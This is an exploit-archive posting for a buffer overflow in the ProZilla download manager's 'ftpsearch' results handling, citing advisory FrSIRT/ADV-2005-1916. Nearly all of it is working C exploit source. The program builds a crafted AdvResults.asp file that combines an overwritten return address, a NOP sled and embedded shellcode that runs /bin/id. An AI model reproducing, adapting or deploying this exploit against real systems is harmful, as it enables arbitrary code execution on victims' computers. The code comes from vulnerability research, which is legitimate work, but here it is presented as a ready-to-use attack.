
ProZilla "ftpsearch" Option Client-Side Buffer Overflow Exploit

ino | 2005.10.03 18:40 | Views 1159
ProZilla "ftpsearch" Results Handling Client-Side Buffer Overflow Exploit
Date : 02/10/2005

Advisory : FrSIRT/ADV-2005-1916
CVE Reference : CAN-2005-2961
Rated as : High Risk

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define OVERFLOW (1<<10)+32
#define SLEDSIZ (1<<10)
#define RETADDR 0x806977a+SLEDSIZ/2
#define OUTPUT "AdvResults.asp"

/*
* prozilla bug, found while auditing for gentoo bug #70090
* -taviso@gentoo.org
*/

/* execve() /bin/id */
unsigned char shellcode[] =
"\x33\xc9\x83\xe9\xf5\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x7e"
"\x02\xad\x8e\x83\xeb\xfc\xe2\xf4\x14\x09\xf5\x17\x2c\x64\xc5\xa3"
"\x1d\x8b\x4a\xe6\x51\x71\xc5\x8e\x16\x2d\xcf\xe7\x10\x8b\x4e\xdc"
"\x96\x0a\xad\x8e\x7e\x2d\xcf\xe7\x10\x2d\xc4\xea\x7e\x55\xfe\x07"
"\x9f\xcf\x2d\x8e";

int main(int argc, char **argv)
{
    unsigned char *buf;
    void *ret = (void *) RETADDR;
    FILE *exploit;
    int i;

    exploit = fopen(OUTPUT, "w");
    fprintf(exploit, "\n");

    /* fill the overflow region with the repeated return address */
    buf = malloc(OVERFLOW);
    for (i = 0; buf + i < buf + OVERFLOW; i += sizeof(void *))
        memcpy(buf + i, &ret, sizeof(void *));
    fwrite(buf, OVERFLOW, 1, exploit);
    fprintf(exploit, "\n");

    /* NOP sled followed by the shellcode */
    buf = realloc(buf, SLEDSIZ + sizeof(shellcode));
    memset(buf, 0x90, SLEDSIZ);
    memcpy(buf + SLEDSIZ, shellcode, sizeof(shellcode));
    fwrite(buf, SLEDSIZ + sizeof(shellcode), 1, exploit);
    free(buf);
    fprintf(stderr, "[*] %s created.\n", OUTPUT);
    return 0;
}